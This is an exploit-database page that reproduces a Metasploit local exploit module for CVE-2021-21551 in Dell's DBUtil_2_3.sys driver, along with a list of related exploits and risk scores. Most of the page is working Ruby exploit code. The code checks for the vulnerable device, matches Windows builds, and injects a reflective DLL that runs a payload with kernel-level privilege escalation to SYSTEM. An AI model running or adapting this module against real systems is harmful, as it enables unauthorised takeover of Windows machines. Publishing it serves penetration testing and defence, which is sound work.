Dell DBUtil_2_3.sys IOCTL Memory Read / Write Exploit

🗓️ 17 May 2021 00:00:00Reported by metasploitType

zdt🔗 0day.today👁 266 Views

Dell DBUtil_2_3.sys vulnerability allows unauthenticated access to kernel-mode memory, leading to privilege escalation

Reporter	Title	Published	Views	Family All 49
GithubExploit	Exploit for Exposed IOCTL with Insufficient Access Control in Dell Dbutil	13 May 202113:23	–	githubexploit
GithubExploit	Exploit for Exposed IOCTL with Insufficient Access Control in Dell Dbutil	2 Dec 202519:47	–	githubexploit
GithubExploit	Exploit for Exposed IOCTL with Insufficient Access Control in Dell Dbutil	28 May 202107:29	–	githubexploit
GithubExploit	Exploit for Exposed IOCTL with Insufficient Access Control in Dell Dbutil	2 Aug 202420:14	–	githubexploit
GithubExploit	Exploit for Exposed IOCTL with Insufficient Access Control in Dell Dbutil	21 May 202103:13	–	githubexploit
GithubExploit	Exploit for Exposed IOCTL with Insufficient Access Control in Dell Dbutil	30 May 202110:15	–	githubexploit
GithubExploit	Exploit for Exposed IOCTL with Insufficient Access Control in Dell Dbutil	3 Sep 202101:47	–	githubexploit
GithubExploit	Exploit for CVE-2018-19320	17 Feb 202620:48	–	githubexploit
GithubExploit	Exploit for Improper Input Validation in Intel Ethernet_Diagnostics_Driver_Iqvw32.Sys	25 Jan 202602:03	–	githubexploit
GithubExploit	Exploit for Exposed IOCTL with Insufficient Access Control in Dell Dbutil	2 Jun 202105:13	–	githubexploit

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Local
  Rank = GoodRanking

  include Msf::Exploit::Local::WindowsKernel
  include Msf::Post::File
  include Msf::Post::Windows::Priv
  include Msf::Post::Windows::Process
  include Msf::Post::Windows::ReflectiveDLLInjection
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        {
          'Name' => 'Dell DBUtil_2_3.sys IOCTL memmove',
          'Description' => %q{
            The DBUtil_2_3.sys driver distributed by Dell exposes an unprotected IOCTL interface that can be abused by
            an attacker read and write kernel-mode memory.
          },
          'License' => MSF_LICENSE,
          'Author' => [
            'Kasif Dekel',     # (from SentinelLabs) blog with detailed analysis
            'SentinelLabs',    # vulnerability discovery and detailed analysis
            'Spencer McIntyre' # metasploit module
          ],
          'Arch' => [ ARCH_X64 ],
          'Platform' => 'win',
          'SessionTypes' => [ 'meterpreter' ],
          'DefaultOptions' =>
        {
          'EXITFUNC' => 'thread'
        },
          'Targets' =>
        [
          [ 'Windows x64', { 'Arch' => ARCH_X64 } ]
        ],
          'Payload' =>
        {
          'DisableNops' => true
        },
          'References' =>
        [
          [ 'CVE', '2021-21551' ],
          [ 'URL', 'https://labs.sentinelone.com/cve-2021-21551-hundreds-of-millions-of-dell-computers-at-risk-due-to-multiple-bios-driver-privilege-escalation-flaws/' ],
          [ 'URL', 'https://www.dell.com/support/kbdoc/ro-ro/000186019/dsa-2021-088-dell-client-platform-security-update-for-dell-driver-insufficient-access-control-vulnerability' ],
        ],
          'DisclosureDate' => '2021-05-04',
          'DefaultTarget' => 0,
          'Notes' =>
        {
          'Stability' => [ CRASH_OS_RESTARTS, ],
          'Reliability' => [ REPEATABLE_SESSION, ]
        }
        }
      )
    )
  end

  def check
    sysinfo_value = sysinfo['OS']

    if sysinfo_value !~ /windows/i
      # Non-Windows systems are definitely not affected.
      return Exploit::CheckCode::Safe
    end

    handle = open_device('\\\\.\\dbutil_2_3', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
    if handle.nil?
      return Exploit::CheckCode::Safe
    end

    session.railgun.kernel32.CloseHandle(handle)
    CheckCode::Appears
  end

  def target_compatible?
    sysinfo_value = sysinfo['OS']

    build_num = sysinfo_value.match(/Build (\d+)/)[1].to_i
    vprint_status("Windows Build Number = #{build_num}")

    return true if sysinfo_value =~ /Windows 7/ && ((build_num == 7600) || (build_num == 7601))
    return true if sysinfo_value =~ /Windows 8\.1/ && (build_num == 9600)
    return true if sysinfo_value =~ /Windows 10/ && (build_num >= 14393 && build_num <= 19042)
    return true if sysinfo_value =~ /Windows 2016/ && (build_num >= 14393 && build_num <= 19042)

    false
  end

  def exploit
    if is_system?
      fail_with(Failure::None, 'Session is already elevated')
    end

    # check that the target is a compatible version of Windows (since the offsets are hardcoded) before loading the RDLL
    unless target_compatible?
      fail_with(Failure::NoTarget, 'The exploit does not support this target')
    end

    if sysinfo['Architecture'] == ARCH_X64 && session.arch == ARCH_X86
      fail_with(Failure::NoTarget, 'Running against WOW64 is not supported')
    elsif sysinfo['Architecture'] == ARCH_X64 && target.arch.first == ARCH_X86
      fail_with(Failure::NoTarget, 'Session host is x64, but the target is specified as x86')
    elsif sysinfo['Architecture'] == ARCH_X86 && target.arch.first == ARCH_X64
      fail_with(Failure::NoTarget, 'Session host is x86, but the target is specified as x64')
    end

    encoded_payload = payload.encoded
    execute_dll(
      ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-21551', 'CVE-2021-21551.x64.dll'),
      [encoded_payload.length].pack('I<') + encoded_payload
    )

    print_good('Exploit finished, wait for (hopefully privileged) payload execution to complete.')
  end
end

17 May 2021 00:00Current

0.9Low risk

Vulners AI Score0.9

CVSS 3.17.8 - 8.8

CVSS 24.6

EPSS0.74523